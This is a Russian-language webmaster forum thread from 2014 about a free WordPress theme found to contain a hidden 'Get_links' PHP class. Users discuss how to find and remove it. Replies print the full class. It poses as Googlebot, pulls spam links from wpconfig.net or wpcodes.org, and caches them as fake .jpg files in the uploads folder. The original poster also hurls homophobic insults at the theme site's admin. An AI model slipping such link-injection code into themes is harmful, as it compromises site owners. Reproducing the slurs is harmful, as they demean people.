Вирусня в бесплатном шаблоне WP

55

par14ok

18 августа 2014, 09:45

5422

Добрый день.

Обнаружил с помощью плагина антивируса в шаблоне WP подозрительный код.

И так поведение сайта очень не нравиться (какие-то ссылки в инструментах гугл, не индексируется яшей) а тут еще ...

В php не понимаю ничего практически, нужна подсказка что это и как бороться.

А еще подскажите где взять для этого движка бесплатный нормальный шаблон (если этот сложно будет исправить, я на него много времени потратил, но если нужно то сменю) (интересует проверенный ресурс). Покупать пока свободных средств нету. Постоянно работал на DLE так там проблем с таким нету, а тут экспериментов захотел и боком вылезло.

Антивирус показывает: (для удобства прикрепил скрин)

$data = @file_get_contents('http://' . $host . $path, false, $contex ...
file_put_contents($file, $data);

file_put_contents($file, $data);

$data = file_get_contents($file);

А еще интересует есть ли связь с этими штуками с этими непонятно откуда взявшимися ссылками в инструментах вебмастера гугл, раньше я думал что это ссылки с прошлого владельца сайта, но теперь мнение изменилось:

Вообще ты меня бесишь.

204

MrDesigner

18 августа 2014, 09:51

#1

Если берёте шаблон отсюда:

http://wordpress.org/themes/greyzed

вирусов не будет.

55

par14ok

18 августа 2014, 10:19

#2

Хотелось бы узнать что этот вирус делает ... и по возможности убрать .. так как много чего сделано ... навигация, микроразметка рейтинга, все выровнял ... всего и не упомнишь, что если эти строки убрать и все ?

Выложил файл functions.php может кто глянет.

[ATTACH]136940[/ATTACH]

zip functions.zip

Настройки хостинга Звездочки в микроразметке Микроразметка и вид в

162

Mad_Man

18 августа 2014, 10:39

#3


<?php

error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}

?>

1

82

t1mkke

18 августа 2014, 10:41

#4

par14ok, похоже что класс Get_links стучится на чей-то сайт и берет от туда ссылки, потом сохраняет его у вас на сервере. Удалите этот класс и посмотрите что у вас в папке wp-content/uploads/2011/ Походу дорвеи у вас. Можете найти человека который проверит ваш сайт, вот спросите у него /ru/forum/842906

2

Bing открыл доступ к Google создал форму для Закрытый от индексации Google

55

par14ok

18 августа 2014, 11:43

#5

Короче выяснилось что t1mkke прав, но если убрать этот класс то слетает шаблон, то же происходит если взять файл из оригинального шаблона.

А еще этот пассивный гомик, админ сайта wp-templates.ru автор этой махинации где то здесь на серче барыжит ссылочками из сайтов жертв таких как я. Что б у тебя половой орган отсох. Оставлю во всех отзовиках хорошие отзывы про тебя, и абуз накатаю куда только можно не пожалею времени.

1

Директ рекламирует сайты мошенников Проблема с Otzovik.com Электронные кошельки в законе

82

t1mkke

18 августа 2014, 11:47

#6

par14ok, ищи по шаблону где используется класс Get_links и удаляй, ну или лучше обратиться к спецу, если сам не сильно шаришь в php.

1

55

par14ok

18 августа 2014, 11:50

#7

Я нашел, используется в comments.php. Вот что этот кретин написал на своем сайте.

Убрал, подскажите пожалуйста, поможет ли (пропадут ли ссылки) если оставить код в functions.php ?

Правила использования шаблонов

Шаблоны WordPress с портала wp-templates.ru имеют бесплатное распространение. Темы взяты из разделов свободного скачивания на сайтах авторов шаблонов, поэтому их копирование и использование не нарушает авторских прав.

Наш сайт помогает пользователям подобрать качественный шаблон для своего сайта. Взамен мы размещаем на сайтах, использующих шаблоны, скрытые или видимые ссылки, которые не портят внешний вид как шаблона, так и самого сайта, использующего данный шаблон.

Если вы хотите чтобы на вашем сайте не выводились партнерские ссылки, вам нужно отредактировать файл шаблона “comments.php”(иногда код находится в “footer.php”), удалив код:
<?php $lib_path = dirname(__FILE__).’/'; require_once(‘functions.php’); $links = new Get_links(); $links = $links->get_remote(); echo $links; ?>

На шаблон greyzed решение - полностью удалить функцию с файла functions.php (убрать этот код):


class Get_links {

    var $host = 'wpcodes.org';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}

И поменять файл comments.php на оригинальный (если просто убрать вывод класса то слетает шаблон).

Проблема решена. Иду писать пламенные отзывы о "хорошем" сайте "wp-templates.ru".

Удаление строки из файлов Этот код оставить или скрытая сквозная внешняя ссылка

3

AshtonLex

18 августа 2014, 12:37

#8

Бесплатные темы только здесь и нигде больше, запомните! В остальных случаях вы расплачиваетесь шеллами, вирусами и спам-мейлерами.

par14ok:
Проблема решена. Иду писать пламенные отзывы о "хорошем" сайте "wp-templates.ru".

Уже давно все написано тут!

2

Специалист по WordPress и phpBB

55

par14ok

18 августа 2014, 13:37

#9

AshtonLex, есть еще много черных списков и отзовиков )) мне не жалко )

K5

209

kgtu5

19 августа 2014, 03:00

#10

А еще этот пассивный гомик, админ сайта wp-templates.ru автор этой махинации где то здесь на серче барыжит ссылочками из сайтов жертв таких как я. Что б у тебя половой орган отсох. Оставлю во всех отзовиках хорошие отзывы про тебя, и абуз накатаю куда только можно не пожалею времени.

истерить ни к чему, шаблоны на то и "бесплатные", что сделали их за вас.

wp-templates.ru

ну уж а если владелец ресурса сам честно пишет о наличии вставки, то совет простой - читайте описания перед использованием.

или в банке после получения кредита вы тоже будете кричать, что там куча комиссий, а вы хотели только денег без процентов???

1

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Подскажите как полностью скопировать Куда будем выводить с Прием вкладов без нападок

Google: E-E-A-T не является фактором ранжирования

Что такое Power BI и зачем это нужно бизнесу